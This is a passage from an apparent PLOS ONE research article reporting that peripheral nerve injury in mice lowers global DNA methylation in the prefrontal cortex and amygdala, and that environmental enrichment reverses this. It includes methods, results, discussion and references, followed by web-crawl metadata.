Nerve injured mice show a decrease in global methylation in the PFC (a) and amygdala (b) six months after the induction of peripheral neuropathy. No such changes were observed in the thalamus (c) or visual cortex (d). *** = p<0.0001, n = 8–10/group, error bars indicate S.E.M.
http://dx.doi.org/10.1371/journal.pone.0055259.g002
All experiments were approved by the Animal Care Committee at McGill University, and conformed to the ethical guidelines of the Canadian Council on Animal Care and the guidelines of the Committee for Research and Ethical Issues of the International Association for the Study of Pain published in PAIN, 16 (1983) 109–110. All surgery was performed under isoflurane anesthesia, and all efforts were made to minimize suffering.
Induction of Nerve Injury
Neuropathy was induced using the spared nerve injury model. Under deep anesthesia, an incision was made on the lateral surface of the thigh through the muscle, exposing the three terminal branches of the sciatic nerve: the sural, common peroneal and tibial nerves. The common peroneal and the tibial nerves were tightly ligated with 6.0 silk (Ethicon) and sectioned distal to the ligation. The sural nerve was left intact. Sham surgery involved exposing the nerve without damaging it [13].
Behavioral Assessment
All animals underwent baseline behavioral assessments immediately prior to surgery and no differences were observed between groups (data not shown). The first cohort were then re-assessed six months following nerve injury or sham surgery control (Figures 1 and 2). In the environmental study (Figures 3 and 4), the presence of nerve injury-induced hypersensitivity was confirmed three months following surgery when the environmental manipulations were implemented and again two months after environmental change.
thumbnail
Figure 3. Environmental Enrichment Reverses Nerve Injury-Induced Neuropathic Pain and Pathological Changes in DNA Methylation in the Prefrontal Cortex.
Three months following nerve injury and the establishment of chronic neuropathic pain, mice were subjected to an enriched or an impoverished environment for an additional two months. Environmental enrichment resulted in decreases in mechanical (A) and cold sensitivity (B) in nerve-injured animals towards control values. (C) These changes in cutaneous hypersensitivity following environmental enrichment were accompanied by reversal of the nerve injury-induced decreases in global methylation in the impoverished group such that global methylation was no longer different from control values (1-way ANOVA, F(3,21) = 4.545, p = 0.013, tukeys multiple comparison test). * = p<0.05, ** = p<0.01,*** = p<0.001; control, enriched vs. impoverished or injured, enriched vs. impoverished; n = 5–8/group, error bars indicate S.E.M.
http://dx.doi.org/10.1371/journal.pone.0055259.g003
thumbnail
Figure 4. Global Methylation in the Prefrontal Cortex Correlates with the Magnitude of Nerve Injury-Induced Hypersensitivity.
Correlation analysis was performed on the data from Figure 3. Significant correlations were observed between % global methylation and hypersensitivity to mechanical (a) and cold stimuli (b), in neuropathic but not control mice. * = p<0.05, ** = p<0.01.
http://dx.doi.org/10.1371/journal.pone.0055259.g004
Mechanical Sensitivity.
Calibrated monofilaments (Stoelting Co., Wood Dale, IL) were applied to the plantar surface of the hindpaw and the 50% threshold to withdraw (grams) was calculated as previously described [14]. The stimulus intensity ranged from 0.008 g to 4 g.
Cold Sensitivity.
A modified version of the acetone drop test [15] was used: total duration of acetone-evoked behaviors (flinching, licking or biting) was measured for 1 minute after acetone (∼25 µl) was applied to the plantar surface of the hindpaw with the aid of a blunt needle attached to a syringe.
Motor Function.
The accelerating rotarod assay was used (IITC Life Science Inc., Woodland Hills, CA) with the mouse adapter [16]. The task includes a speed ramp from 0 to 30 rpm over 60 s, followed by an additional 240 s at the maximal speed.
Overall Activity.
Mice were individually placed individually into the centre of a transparent open field (26×26 cm2) in a quiet room illuminated with white light and their spontaneous behavior was videotaped. The floor of the apparatus was equally divided into nine squares. The total number of squares visited in a 5 minute period was assessed. An animal must fully enter the square for it to be considered as visited. Since each square is similar in size to an average mouse (∼8–10 cm), the number of squares visited serves as a proxy measure for general motor activity.
Anxiety-like behavior.
The same open field was used with the primary measure being the time spent in the central square during the 5 minute task [17].
Environmental Manipulation
Three months after injury or sham surgery, the presence of neuropathic pain was confirmed and mice were randomly assigned to one of four groups: injured with enriched environment, injured with impoverished environment, sham with enriched environment, sham with impoverished environment. The standard, enriched and impoverished environments are described above. Mice were then re-tested 2 months following environmental manipulation and tissue was collected.
Tissue Extraction
In the first study (Figures 1 and 2), animals were sacrificed 6 months after nerve injury or sham surgery by decapitation following isoflurane anesthesia. In the enrichment experiment (Figures 3 and 4), animals were sacrificed 5 months after nerve injury or sham, of which the final 2 months were spent in enriched or impoverished environments. Anatomical regions were defined according to the stereotaxic coordinates (rostral–caudal, medial–lateral and dorsal–ventral from bregma) by Paxinos and Franklin [18]. The prefrontal cortex (right and left; +1 to +3, −1 to +1, 0 to −2.5), amygdala (right and left; −1 to −3, ±4 to ±1.5, −4 to −6), thalamus (0 to −3, −2 to + 2, −2.5 to −4.25), and visual cortex (right and left; −2 to −4, −3 to +3, 0 to 2) were extracted, frozen on dry ice and stored at −80 C until use.
DNA Extraction
Tissue was homogenized and incubated in DNA extraction buffer (500 µl) containing proteinase K (20 µl; 20 mg/ml; Roche, Basel, Switzerland) at 50°C for 12 h. Samples were treated with RNAase A (50 U/mg; 30 min; Roche) and phenol: chloroform (1∶1) added. After phase separation, ethanol (95%) was added to precipitate the DNA. The DNA pellet was then washed and redissolved in ddH2O.
Luminometric Methylation Assay (LUMA)
LUMA is a high throughput assay used to determine genomic global DNA methylation. The LUMA method used in our study is a modification described by Karimi et al. [19], [20]. LUMA involves the digestion of genomic DNA by methylation sensitive (HPAII) or insensitive (MSPI) restriction enzymes in combination with an internal control restriction enzyme (EcoRI) to normalize the DNA input. Both HpaII and MspI restriction enzymes recognize and cleave 5′-CCGG-3′ sequences producing 5′-CG overhangs, whereas EcoRI recognizes and cleaves 5′-GAATTC-3′ sequences and produces 5′-AATT overhangs. The extent of cleavage is determined by a bioluminetric polymerase extension assay based on a four-step pyrosequencing reaction.
Samples were incubated (37°C, 4 h) and then heat inactivated (80°C, 20 min). Digested genomic DNA (15 µl) was mixed with pyrosequencing annealing buffer (15 µl; Qiagen, Toronto, ON, Canada). Samples were transferred to 24-well pyrosequencing plates for sequencing (PyroMark 24; Biotage, Uppsala, Sweden). The nucleotide dispensation order used was based on Pilsner et al. [21]. Peak heights for C and A represent the HpaII and MspI cuts (methylation) and EcoRI (input DNA), respectively. The formula to calculate % genomic methylation is: 1-[(HpaII (C)/EcoRI (A)/MspI (C)/EcoRI (A)]×100. All samples were run in triplicate.
Statistical Analysis
All data are expressed as mean ± standard error of the mean (SEM). Comparisons between injured and control groups (Figures 1 and 2) or between enriched vs. impoverished (Figures 3A,B) were performed using 2-tailed, unpaired student's t-test. The data in Figure 3C was analyzed by one-way ANOVA followed by Tukeys test for multiple comparisons. Significance was set at P<0.05. Welch's correction was used when the assumption of equal variances was not met. The degree of co-variation between mechanical or cold sensitivity and global methylation was determined by calculating Pearson's coefficient since our data followed a Gaussian distribution. Statistical analysis was undertaken using Prism (GraphPad Software Inc, San Diego, California).
Results
Behavioral signs of neuropathic pain, motor impairment and anxiety six months following peripheral nerve injury
Chronic, persistent changes in cutaneous sensitivity to both mechanical and cold stimuli were detected six months following nerve injury. Injured mice displayed decreased mechanical thresholds (Figure 1A) and increased acetone-evoked behaviors (Figure 1B). Animals with nerve injury were significantly impaired in motor capacity in the rotarod assay (Figure 1C).
Animals with neuropathy exhibited signs of anxiety in the open field assay six months after injury (Figure 1D). Despite the fact that injured animals visited the same number of peripheral squares as control animals (Figure 1E), they spent significantly less time in the central square compared to control mice (Figure 1F).
Nerve injury was associated with decreased global methylation in the prefrontal cortex and amygdala, but not the thalamus or visual cortex, six months following injury
Peripheral nerve injury resulted in a decrease in global methylation in the prefrontal cortex (Figure 2A) and the amygdala (Figure 2B) that was detected 6 months after injury. No significant changes were observed in the thalamus (Figure 2C) or visual cortex (Figure 2D). Since there were no significant differences in global methylation between right and left brain structures, the results reported here are the average of the two sides.
Environmental enrichment reverses nerve injury-induced chronic pain and abnormal global methylation in the prefrontal cortex
Three months after peripheral nerve injury, a second set of mice were removed from standard housing and placed in either an enriched or an impoverished environment for two additional months. The enriched environment was associated with decreased nerve injury-induced hypersensitivity to mechanical and cold stimuli compared to the impoverished environment (Figures 3A,B). This was accompanied by the recovery of nerve injury-induced reductions in global methylation in the PFC to normal, control levels (Figure 3C).
Correlation between global methylation in the prefrontal cortex and hypersensitivity to cutaneous stimuli
Analysis of the data from Figure 3 revealed significant correlations between the magnitude of both mechanical (Figure 4A) and cold (Figure 4B) hypersensitivity and global methylation in the PFC in injured, but not in control animals. Specifically, following environmental manipulation, nerve-injured animals with higher global % methylation in the PFC had reduced hypersensitivity to mechanical and thermal stimuli.
Discussion
DNA Methylation and Chronic Neuropathic Pain
Epigenetic mechanisms triggered by injury have been hypothesized to participate in mediating the lasting changes in the CNS associated with chronic pain [22]. To date, most of the work related to chronic pain has focused on the role of histone acetylation/deacetylation [23], mainly using pharmacological tools [24], [25], [26], [27], with few reports of changes in DNA methylation in chronic pain conditions [28], [29], [30], [31]. In this study, a mouse model of neuropathic pain following peripheral nerve injury was used to test the hypothesis that ongoing, chronic painful neuropathy induces changes in global DNA methylation in the brain.
Our data show decreases in global DNA methylation in the PFC and amygdala six months following a peripheral nerve injury in the hindlimb. This is consistent with many of the comorbidities that develop when pain has transitioned from being acute to chronic, such as chronic-pain associated depression [32]. Furthermore, these global changes were region-specific; similar effects were not observed in the thalamus or the visual cortex, even though the former receives direct input from nociceptive neurons. It is important to note that regions that did not show global changes may still undergo changes in DNA methylation at the individual gene level that are not detectable by a global methylation assay such as the LUMA. However, the fact that alterations were observed in the PFC and amygdala shows a strong link between nerve injury-induced hypersensitivity and changes in DNA methylation in the brain and provides a potential link between injury, chronic pain and co-morbidities such as cognitive dysfunction, depression and anxiety.
The magnitude of the nerve injury-associated changes in global methylation in the PFC from 60% to 48% suggests that the changes are broad and affect wide parts of the genome. It is estimated that the mouse genome contains ∼20 million CpG sites, the targets for DNA methylation. The LUMA assay used in this study is sensitive to ∼1.5 million of these sites. Therefore, a decrease of 12% in this assay corresponds to a minimum estimated demethylation of ∼180,000 CpG sites following nerve injury, a number predicted to alter the expression of hundreds of individual genes [33].
Global methylation is an indicator of the overall state of the DNA methylation machinery and has long-range consequences on genome function and organization [34], [35], [36]. Recent data suggests that the landscape of altered DNA methylation in other pathologies such as cancer spans thousands of genes [37] and intergenic regions [38]. Programming of DNA methylation encompasses both global changes in genome methylation and gene-specific changes that target discreet regulatory regions, thus affecting gene expression. Changes in global DNA methylation state affect high-level organization of genome function [39]. These changes produce lasting effects on the regulation of the transcriptome and higher order chromatin folding [40] and are capable of affecting many aspects of cell function. The population of methylated CpG sites in gene promoters and known regulatory regions constitutes only a small fraction of global DNA methylation. Given the magnitude of the pathological changes in DNA methylation observed in this study, they must therefore also involve regions in the genome beyond individual gene promoters and gene regulatory sequences. Indeed, demethylation/methylation of all known promoters and regulatory regions in the genome would in itself not have a significant impact on global DNA methylation.
Dynamic Mechanisms Mediating Chronic Pain
In this study, the epigenetic changes were attenuated by a behavioral intervention. Environmental enrichment reversed nerve injury-related reductions in global DNA methylation in the PFC and reduced hypersensitivity to mechanical and cold stimuli. Furthermore, the % global PFC methylation co-varied with the severity of neuropathic pain. It is currently unclear why similar correlations were not observed in the uninjured, control mice. While it is also not clear whether it is the enrichment itself or the pain attenuation that is mediating the reversal of hypo-methylation in the PFC, data from the enrichment experiment nonetheless suggests that the methylation changes in the brain are dynamic and reversible by a behavioral intervention. Regardless, the particularly relevant since, in human patients with low back pain, both pain duration and intensity has been related to reduced grey matter in the PFC [41], and the magnitude of pain reduction following treatment correlated with corresponding increases in the thickness and normalization of functional activity in the PFC [4]. We therefore speculate that the regulation of global methylation such as described here may contribute to the dynamic changes in cortical structure and function observed in human chronic pain patients.
Distance from the Time and Site of Injury
The main finding emphasized in this manuscript is the long-range effects of peripheral nerve injury on the mouse methylome. Equally interesting is the observation that these methylation changes occur at a site distant from the original injury. While epigenetic changes have been reported in the dorsal root ganglia and spinal cord following persistent pain states [30], [31], here we focused on higher-order processing centers in the brain. Interestingly, in the study by Wang et al., decreasing global DNA methylation in the spinal cord resulted in attenuation of pain symptoms in the first two weeks following chronic constriction of the sciatic nerve in rats; this is the opposite of what we would predict in the PFC [30]. Thus, the directionality and consequences of changes in global DNA methylation in chronic pain may be region-specific (spinal vs. supraspinal), species-specific (rat vs. mouse), may vary by type of injury or may vary as a function of chronicity (2 weeks vs. 6 months). Each of these possible explanations has potential clinical implications, additional studies are needed to further explore this discrepancy.
Pain is more than mere nociception; according to the International Association for the Study of Pain (IASP), pain is defined as “…an unpleasant sensory and emotional experience associated with actual or potential tissue damage, or described in terms of such damage” [42]. It is therefore crucial that we study the effects of chronic pain in areas that are involved in perception and emotional processing, such as the PFC and amygdala. Our data draws attention to the nature of chronic pain as a complex phenomenon: it is associated with higher order behavioral co-morbidities beyond changes in nociceptive thresholds, and it encompass a wide range of conditions that make chronic pain a disease that is difficult to understand and to treat.
Limitations and Future Directions
The current data is consistent with the working hypothesis that DNA methylation is involved in chronic pain: a peripheral injury that leads to chronic pain triggers changes in global DNA methylation. However, it does not define a causal relationship between DNA methylation in the brain and chronic pain or its associated pathologies nor does it establish a relationship between these changes in DNA methylation and changes in gene expression. Future studies could address the causal relationships by evaluating the effects of pharmacological or environmental modulation of DNA methylation on pain threshold.
Although our data shows that environmental enrichment returned nerve injury-related changes in global DNA methylation to control levels, it is possible that a certain populations of individual gene promoters maintained their differentially methylated state. Future studies incorporating comprehensive, high throughput analysis of changes in DNA methylation and their effect on the expression of individual genes in chronic pain conditions are needed. Such studies are currently underway in our laboratory.
Our study does not distinguish between the effects of nerve injury from those of ongoing chronic pain and its comorbidities. It is possible that the observed supraspinal changes are due to other effects of the nerve injury itself such as motor impairment instead of being a consequence of living with chronic pain. Finally, the current study does not examine the time-course of global methylation changes, instead focusing on the long-term effects of peripheral neuropathy on the brain. Further studies are needed to determine how long after nerve injury changes in global DNA methylation develop and if they contribute to or are the result of pain chronification.
Our data is consistent with two alternative but not mutually exclusive hypotheses regarding the involvement of DNA methylation in chronic pain. First, DNA methylation might mediate the effects of peripheral nerve injury on chronic pain by altering epigenetic programming in the brain and inducing the central phenotypes associated with chronic pain. Second, chronic pain might induce the DNA methylation changes, which in turn trigger the downstream pathologies that accompany chronic pain. It is also possible that DNA methylation is involved in both processes. These questions need to be addressed in future studies. Understanding the mechanisms underlying the transition from transient injury to chronic pain as well as the mechanisms mediating the impact of chronic pain on mental and physical health are questions of prime significance. Our study shows that DNA methylation is a plausible mediator of these mechanisms.
Conclusions
Epigenetic modifications are at the interface between environment and genetics, creating a mechanism by which life experiences lead to long-lasting changes in gene expression. Here we show that the induction of peripheral nerve injury has an impact on the brain in the form of decreased DNA methylation in the PFC and amygdala 5–6 months following initial injury. In addition, these pathological changes can be attenuated with environmental enrichment, an intervention that ameliorates neuropathic pain in these animals. Furthermore, global methylation in the PFC correlates to symptom severity. Abnormal DNA methylation in the PFC may therefore provide a molecular substrate for pain-related dysfunction in brain structure and function. Targeting of these changes represents a potential novel therapeutic strategy for the treatment of chronic pain. The implications of epigenetic involvement in chronic pain are wide reaching and may alter the way we think about pain diagnosis, research and treatment.
Author Contributions
Conceived and designed the experiments: MT SA MM PV MCB MS LSS. Performed the experiments: MT SA MM PV CC. Analyzed the data: MT SA MM MS LSS. Wrote the paper: MT MS LSS.
References
1. 1. Tracey I, Bushnell MC (2009) How neuroimaging studies have challenged us to rethink: is chronic pain a disease? The journal of pain : official journal of the American Pain Society 10: 1113–1120. doi: 10.1016/j.jpain.2009.09.001
2. 2. Schweinhardt P, Bushnell MC (2010) Pain imaging in health and disease–how far have we come? The Journal of clinical investigation 120: 3788–3797. doi: 10.1172/jci43498
3. 3. Seminowicz DA, Laferriere AL, Millecamps M, Yu JS, Coderre TJ, et al. (2009) MRI structural brain changes associated with sensory and emotional function in a rat model of long-term neuropathic pain. Neuroimage 47: 1007–1014. doi: 10.1016/j.neuroimage.2009.05.068
4. 4. Seminowicz DA, Wideman TH, Naso L, Hatami-Khoroushahi Z, Fallatah S, et al. (2011) Effective treatment of chronic low back pain in humans reverses abnormal brain anatomy and function. The Journal of neuroscience : the official journal of the Society for Neuroscience 31: 7540–7550. doi: 10.1523/jneurosci.5280-10.2011
5. 5. Rodriguez-Raecke R, Niemeier A, Ihle K, Ruether W, May A (2009) Brain gray matter decrease in chronic pain is the consequence and not the cause of pain. The Journal of neuroscience : the official journal of the Society for Neuroscience 29: 13746–13750. doi: 10.1523/jneurosci.3687-09.2009
6. 6. McGowan PO, Sasaki A, Huang TC, Unterberger A, Suderman M, et al. (2008) Promoter-wide hypermethylation of the ribosomal RNA gene promoter in the suicide brain. PLoS ONE 3: e2085. doi: 10.1371/journal.pone.0002085
7. 7. McGowan PO, Sasaki A, D'Alessio AC, Dymov S, Labonte B, et al. (2009) Epigenetic regulation of the glucocorticoid receptor in human brain associates with childhood abuse. Nat Neurosci 12: 342–348. doi: 10.1038/nn.2270
8. 8. Szyf M, McGowan P, Meaney MJ (2008) The social environment and the epigenome. Environ Mol Mutagen 49: 46–60. doi: 10.1002/em.20357
9. 9. Murgatroyd C, Patchev AV, Wu Y, Micale V, Bockmuhl Y, et al. (2009) Dynamic DNA methylation programs persistent adverse effects of early-life stress. Nat Neurosci 12: 1559–1566. doi: 10.1038/nn.2436
10. 10. Roth TL, Lubin FD, Funk AJ, Sweatt JD (2009) Lasting epigenetic influence of early-life adversity on the BDNF gene. Biol Psychiatry 65: 760–769. doi: 10.1016/j.biopsych.2008.11.028
11. 11. Weaver IC, Champagne FA, Brown SE, Dymov S, Sharma S, et al. (2005) Reversal of maternal programming of stress responses in adult offspring through methyl supplementation: altering epigenetic marking later in life. The Journal of neuroscience : the official journal of the Society for Neuroscience 25: 11045–11054. doi: 10.1523/jneurosci.3652-05.2005
12. 12. Weaver IC, Meaney MJ, Szyf M (2006) Maternal care effects on the hippocampal transcriptome and anxiety-mediated behaviors in the offspring that are reversible in adulthood. Proceedings of the National Academy of Sciences of the United States of America 103: 3480–3485. doi: 10.1073/pnas.0507526103
13. 13. Decosterd I, Woolf CJ (2000) Spared nerve injury: an animal model of persistent peripheral neuropathic pain. Pain 87: 149–158. doi: 10.1016/s0304-3959(00)00276-1
14. 14. Chaplan SR, Bach FW, Pogrel JW, Chung JM, Yaksh TL (1994) Quantitative assessment of tactile allodynia in the rat paw. J Neurosci Methods 53: 55–63. doi: 10.1016/0165-0270(94)90144-9
15. 15. Choi Y, Yoon YW, Na HS, Kim SH, Chung JM (1994) Behavioral signs of ongoing pain and cold allodynia in a rat model of neuropathic pain. Pain 59: 369–376. doi: 10.1016/0304-3959(94)90023-x
16. 16. Jones BJ, Roberts DJ (1968) The quantiative measurement of motor inco-ordination in naive mice using an acelerating rotarod. J Pharm Pharmacol 20: 302–304. doi: 10.1111/j.2042-7158.1968.tb09743.x
17. 17. Prut L, Belzung C (2003) The open field as a paradigm to measure the effects of drugs on anxiety-like behaviors: a review. Eur J Pharmacol 463: 3–33. doi: 10.1016/s0014-2999(03)01272-x
18. 18. Paxinos G, Franklin KBJ (2004) The mouse brain in stereotaxic coordinates. Amsterdam; Boston: Elsevier Academic Press. 1 v. (unpaged) p.
19. 19. Karimi M, Johansson S, Ekstrom TJ (2006) Using LUMA: a Luminometric-based assay for global DNA-methylation. Epigenetics 1: 45–48. doi: 10.4161/epi.1.1.2587
20. 20. Karimi M, Johansson S, Stach D, Corcoran M, Grander D, et al. (2006) LUMA (LUminometric Methylation Assay)–a high throughput method to the analysis of genomic DNA methylation. Exp Cell Res 312: 1989–1995. doi: 10.1016/j.yexcr.2006.03.006
21. 21. Pilsner JR, Lazarus AL, Nam DH, Letcher RJ, Sonne C, et al. (2010) Mercury-associated DNA hypomethylation in polar bear brains via the LUminometric Methylation Assay: a sensitive method to study epigenetics in wildlife. Mol Ecol 19: 307–314. doi: 10.1111/j.1365-294x.2009.04452.x
22. 22. Denk F, McMahon SB (2012) Chronic Pain: Emerging Evidence for the Involvement of Epigenetics. Neuron 73: 435–444. doi: 10.1016/j.neuron.2012.01.012
23. 23. Zhang Z, Cai YQ, Zou F, Bie B, Pan ZZ (2011) Epigenetic suppression of GAD65 expression mediates persistent pain. Nat Med 17: 1448–1455. doi: 10.1038/nm.2442
24. 24. Kiguchi N, Kobayashi Y, Maeda T, Fukazawa Y, Tohya K, et al. (2011) Epigenetic augmentation of the MIP-2/CXCR2 axis through histone H3 acetylation in injured peripheral nerves elicits neuropathic pain. J Pharmacol Exp Ther doi: 10.1124/jpet.111.187724
25. 25. Chiechio S, Copani A, Zammataro M, Battaglia G, Gereau RWt, et al. (2010) Transcriptional regulation of type-2 metabotropic glutamate receptors: an epigenetic path to novel treatments for chronic pain. Trends Pharmacol Sci 31: 153–160. doi: 10.1016/j.tips.2009.12.003
26. 26. Bai G, Wei D, Zou S, Ren K, Dubner R (2010) Inhibition of class II histone deacetylases in the spinal cord attenuates inflammatory hyperalgesia. Mol Pain 6: 51. doi: 10.1186/1744-8069-6-51
27. 27. Chiechio S, Zammataro M, Morales ME, Busceti CL, Drago F, et al. (2009) Epigenetic modulation of mGlu2 receptors by histone deacetylase inhibitors in the treatment of inflammatory pain. Mol Pharmacol 75: 1014–1020. doi: 10.1124/mol.108.054346
28. 28. Viet CT, Ye Y, Dang D, Lam DK, Achdjian S, et al. (2011) Re-expression of the methylated EDNRB gene in oral squamous cell carcinoma attenuates cancer-induced pain. Pain 152: 2323–2332. doi: 10.1016/j.pain.2011.06.025
29. 29. Tajerian M, Alvarado S, Millecamps M, Dashwood T, Anderson KM, et al. (2011) DNA methylation of SPARC and chronic low back pain. Molecular pain 7: 65. doi: 10.1186/1744-8069-7-65
30. 30. Wang Y, Liu C, Guo QL, Yan JQ, Zhu XY, et al. (2011) Intrathecal 5-azacytidine inhibits global DNA methylation and methyl- CpG-binding protein 2 expression and alleviates neuropathic pain in rats following chronic constriction injury. Brain Res 1418: 64–69. doi: 10.1016/j.brainres.2011.08.040
31. 31. Tochiki KK, Cunningham J, Hunt SP, Geranton SM (2012) The expression of spinal methyl-CpG-binding protein 2, DNA methyltransferases and histone deacetylases is modulated in persistent pain states. Molecular pain 8: 14. doi: 10.1186/1744-8069-8-14
32. 32. Fishbain DA, Cutler R, Rosomoff HL, Rosomoff RS (1997) Chronic pain-associated depression: antecedent or consequence of chronic pain? A review. Clin J Pain 13: 116–137. doi: 10.1097/00002508-199706000-00006
33. 33. Fazzari MJ, Greally JM (2004) Epigenomics: beyond CpG islands. Nat Rev Genet 5: 446–455. doi: 10.1038/nrg1349
34. 34. Schuffenhauer S, Bartsch O, Stumm M, Buchholz T, Petropoulou T, et al. (1995) DNA, FISH and complementation studies in ICF syndrome: DNA hypomethylation of repetitive and single copy loci and evidence for a trans acting factor. Hum Genet 96: 562–571. doi: 10.1007/bf00197412
35. 35. Ji W, Hernandez R, Zhang XY, Qu GZ, Frady A, et al. (1997) DNA demethylation and pericentromeric rearrangements of chromosome 1. Mutat Res 379: 33–41. doi: 10.1016/s0027-5107(97)00088-2
36. 36. Chen RZ, Pettersson U, Beard C, Jackson-Grusby L, Jaenisch R (1998) DNA hypomethylation leads to elevated mutation rates. Nature 395: 89–93. doi: 10.1038/25779
37. 37. Stefanska B, Huang J, Bhattacharyya B, Suderman M, Hallett M, et al. (2011) Definition of the landscape of promoter DNA hypomethylation in liver cancer. Cancer Res doi: 10.1158/0008-5472.can-10-3823
38. 38. Hansen KD, Timp W, Bravo HC, Sabunciyan S, Langmead B, et al. (2011) Increased methylation variation in epigenetic domains across cancer types. Nat Genet 43: 768–775. doi: 10.1038/ng.865
39. 39. Espada J, Ballestar E, Santoro R, Fraga MF, Villar-Garea A, et al. (2007) Epigenetic disruption of ribosomal RNA genes and nucleolar architecture in DNA methyltransferase 1 (Dnmt1) deficient cells. Nucleic Acids Res doi: 10.1093/nar/gkm118
40. 40. Kashiwagi K, Nimura K, Ura K, Kaneda Y (2011) DNA methyltransferase 3b preferentially associates with condensed chromatin. Nucleic Acids Res 39: 874–888. doi: 10.1093/nar/gkq870
41. 41. Apkarian AV, Sosa Y, Sonty S, Levy RM, Harden RN, et al. (2004) Chronic back pain is associated with decreased prefrontal and thalamic gray matter density. J Neurosci 24: 10410–10415. doi: 10.1523/jneurosci.2541-04.2004
42. 42. Bonica JJ (1979) The need of a taxonomy. Pain 6: 247–248. doi: 10.1016/0304-3959(79)90046-0
|
{
"url": "http://journals.plos.org/plosone/article?id=10.1371/journal.pone.0055259",
"source_domain": "journals.plos.org",
"snapshot_id": "crawl=CC-MAIN-2016-30",
"warc_metadata": {
"Content-Length": "181006",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:QTVJBQT6DIAIZ5HRJXSQNG4RXNPRB32K",
"WARC-Concurrent-To": "<urn:uuid:b39d1511-55b8-4b3f-8248-92acdc8a2bae>",
"WARC-Date": "2016-07-26T11:10:31Z",
"WARC-IP-Address": "216.74.38.76",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:WHM6FELUVCWUQXMKHEE2BKKRYZPBDRYE",
"WARC-Record-ID": "<urn:uuid:64cf8512-e4a5-48b3-b138-8f508ec31ae4>",
"WARC-Target-URI": "http://journals.plos.org/plosone/article?id=10.1371/journal.pone.0055259",
"WARC-Truncated": "length",
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:c4db995c-fbf5-44f3-b3b5-ab41c2ebdad4>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-185-27-174.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2016-30\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web for July 2016\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
14,
35,
37,
38,
102,
103,
162,
163,
183,
184,
312,
313,
334,
335,
413,
414,
610,
611,
636,
637,
715,
716,
903,
904,
927,
928,
1112,
1113,
1132,
1133,
1241,
1242,
1262,
1263,
1450,
1451,
1478,
1479,
1809,
1810,
1827,
1828,
1888,
1889,
2076,
2077,
2096,
2097,
2157,
2158,
2570,
2571,
2699,
2700,
2721,
2746,
2770,
2790,
2811,
2839,
2856,
2875,
2880,
2882,
2883,
2892,
2893,
4989,
4990,
5003,
5004,
5644,
5645,
6122,
6123,
7357,
7358,
8473,
8474,
8496,
8497,
8505,
8506,
8729,
8730,
9319,
9320,
9330,
9412,
9413,
10125,
10126,
10178,
10179,
10189,
10264,
10265,
10542,
10543,
10595,
10596,
11021,
11022,
11048,
11049,
11539,
11540,
11562,
11563,
12076,
12077,
12087,
12239,
12240,
13064,
13065,
13117,
13118,
13128,
13254,
13255,
13508,
13509,
13561,
13562,
13586,
13587,
13832,
13833,
13851,
13852,
14138,
14139,
14155,
14156,
14383,
14384,
14402,
14403,
14958,
14959,
14982,
14983,
15111,
15112,
15139,
15140,
15598,
15599,
15617,
15618,
16434,
16435,
16450,
16451,
16834,
16835,
16873,
16874,
17590,
17591,
18215,
18216,
18237,
18238,
18980,
18981,
18989,
18990,
19102,
19103,
19466,
19467,
19790,
19791,
19959,
19960,
20398,
20399,
20524,
20525,
21041,
21042,
21148,
21149,
21565,
21566,
21577,
21578,
21623,
21624,
22269,
22270,
23307,
23308,
23884,
23885,
25203,
25204,
25246,
25247,
26536,
26537,
26579,
26580,
27715,
27716,
28457,
28458,
28492,
28493,
29102,
29103,
29609,
29610,
30275,
30276,
31200,
31201,
31213,
31214,
32218,
32219,
32240,
32241,
32412,
32413,
32424,
32425,
32661,
32837,
33108,
33434,
33731,
33953,
34179,
34318,
34525,
34716,
35077,
35385,
35557,
35750,
35948,
36154,
36349,
36496,
36662,
36910,
37200,
37358,
37526,
37788,
38066,
38265,
38518,
38745,
38934,
39238,
39495,
39712,
39832,
40117,
40313,
40483,
40692,
40889,
41139,
41327,
41557
],
"line_end_idx": [
14,
35,
37,
38,
102,
103,
162,
163,
183,
184,
312,
313,
334,
335,
413,
414,
610,
611,
636,
637,
715,
716,
903,
904,
927,
928,
1112,
1113,
1132,
1133,
1241,
1242,
1262,
1263,
1450,
1451,
1478,
1479,
1809,
1810,
1827,
1828,
1888,
1889,
2076,
2077,
2096,
2097,
2157,
2158,
2570,
2571,
2699,
2700,
2721,
2746,
2770,
2790,
2811,
2839,
2856,
2875,
2880,
2882,
2883,
2892,
2893,
4989,
4990,
5003,
5004,
5644,
5645,
6122,
6123,
7357,
7358,
8473,
8474,
8496,
8497,
8505,
8506,
8729,
8730,
9319,
9320,
9330,
9412,
9413,
10125,
10126,
10178,
10179,
10189,
10264,
10265,
10542,
10543,
10595,
10596,
11021,
11022,
11048,
11049,
11539,
11540,
11562,
11563,
12076,
12077,
12087,
12239,
12240,
13064,
13065,
13117,
13118,
13128,
13254,
13255,
13508,
13509,
13561,
13562,
13586,
13587,
13832,
13833,
13851,
13852,
14138,
14139,
14155,
14156,
14383,
14384,
14402,
14403,
14958,
14959,
14982,
14983,
15111,
15112,
15139,
15140,
15598,
15599,
15617,
15618,
16434,
16435,
16450,
16451,
16834,
16835,
16873,
16874,
17590,
17591,
18215,
18216,
18237,
18238,
18980,
18981,
18989,
18990,
19102,
19103,
19466,
19467,
19790,
19791,
19959,
19960,
20398,
20399,
20524,
20525,
21041,
21042,
21148,
21149,
21565,
21566,
21577,
21578,
21623,
21624,
22269,
22270,
23307,
23308,
23884,
23885,
25203,
25204,
25246,
25247,
26536,
26537,
26579,
26580,
27715,
27716,
28457,
28458,
28492,
28493,
29102,
29103,
29609,
29610,
30275,
30276,
31200,
31201,
31213,
31214,
32218,
32219,
32240,
32241,
32412,
32413,
32424,
32425,
32661,
32837,
33108,
33434,
33731,
33953,
34179,
34318,
34525,
34716,
35077,
35385,
35557,
35750,
35948,
36154,
36349,
36496,
36662,
36910,
37200,
37358,
37526,
37788,
38066,
38265,
38518,
38745,
38934,
39238,
39495,
39712,
39832,
40117,
40313,
40483,
40692,
40889,
41139,
41327,
41557,
41658
]
}
|
{
